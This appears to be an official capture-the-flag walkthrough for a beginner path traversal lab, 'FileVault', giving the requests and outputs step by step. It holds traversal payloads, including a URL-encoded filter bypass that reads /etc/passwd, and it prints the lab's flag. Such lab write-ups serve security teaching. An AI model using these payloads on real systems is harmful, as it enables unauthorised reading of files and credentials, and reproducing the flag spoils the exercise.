HACKR.GG
hackr.gg — FileVault — Path Traversal Intro Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

FileVault — Path Traversal Intro

Path Traversal · Path Traversal
Difficulty
Beginner
Vuln class
Path Traversal
Steps
3
// Objective
Escape the base directory by injecting ../ sequences in the file parameter to read /flag.txt.
// Tools required
BrowsercurlBurp Suite
// Step-by-step walkthrough
1
Observe the file loading parameter
The app loads files via a ?file= parameter. Try a normal file first to see how it works.
Command / Input
GET /view?file=readme.txt
Output
Welcome to FileVault...
2
Inject path traversal sequences
Attempt to escape the base directory using ../ sequences to reach /flag.txt.
Command / Input
GET /view?file=../../../../flag.txt
Output
HackrGG{p4th_tr4v3rs4l_1ntr0_d0n3}
The number of ../ sequences needed depends on the depth of the base directory.
3
Try URL-encoded bypass if blocked
If filters strip ../, try URL-encoding: %2e%2e%2f or %2e%2e/
Command / Input
GET /view?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
If the filter strips the literal string "../" but doesn't decode first, encoded sequences bypass it.
// Flag
Flag value
HackrGG{p4th_tr4v3rs4l_1ntr0_d0n3}
At /flag.txt, reached by escaping the base directory with ../ sequences.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute